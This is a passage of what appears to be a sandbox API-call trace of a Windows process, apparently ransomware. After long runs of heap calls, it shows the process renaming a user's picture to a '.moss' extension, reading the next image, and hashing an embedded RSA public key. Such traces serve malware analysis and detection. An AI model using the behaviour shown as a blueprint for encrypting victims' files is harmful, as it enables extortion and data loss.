Flags=0x0, Size=0x8) returned 0x35fd320 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2588 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa26a0 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dff8 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0171.804] GetCurrentThreadId () returned 0x324 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b4f6b8 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.804] GetCurrentThreadId () returned 0x324 [0171.804] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfe0 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dff8 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dfc8 [0171.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e010 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dfe0 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0171.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa27b8 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2470 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfe0 | out: hHeap=0xcd0000) returned 1 [0171.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e010 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dff8 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfc8 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dfb0 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50e00 | out: hHeap=0xcd0000) returned 1 [0171.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.808] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x114da, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x114da, lpOverlapped=0x0) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0171.808] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x114df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.808] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0171.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0171.809] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0171.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0171.809] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0171.809] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0171.809] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0171.809] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0171.809] CloseHandle (hObject=0x664) returned 1 [0171.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0171.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0171.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0171.810] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\BBZsmL.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\bbzsml.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\BBZsmL.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\bbzsml.gif.moss")) returned 1 [0171.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.813] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf15acb50, ftCreationTime.dwHighDateTime=0x1d5dfbd, ftLastAccessTime.dwLowDateTime=0x30fe1d00, ftLastAccessTime.dwHighDateTime=0x1d5dbd3, ftLastWriteTime.dwLowDateTime=0x30fe1d00, ftLastWriteTime.dwHighDateTime=0x1d5dbd3, nFileSizeHigh=0x0, nFileSizeLow=0x53f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gkhaSVWy.png", cAlternateFileName="")) returned 1 [0171.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0171.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.814] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\gkhaSVWy.png") returned=".png" [0171.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\gkhaSVWy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\gkhasvwy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.815] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=21497) returned 1 [0171.815] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.818] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x53d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.818] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.819] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.819] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.819] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.819] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x53f9, lpOverlapped=0x0) returned 1 [0171.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.819] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.819] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.821] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.821] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.821] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.821] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.821] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.821] GetLastError () returned 0x0 [0171.821] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.821] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.821] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.821] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.821] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.821] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x5400) returned 0x3b53ea8 [0171.823] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0171.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0171.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.823] RtlAllocateHeap 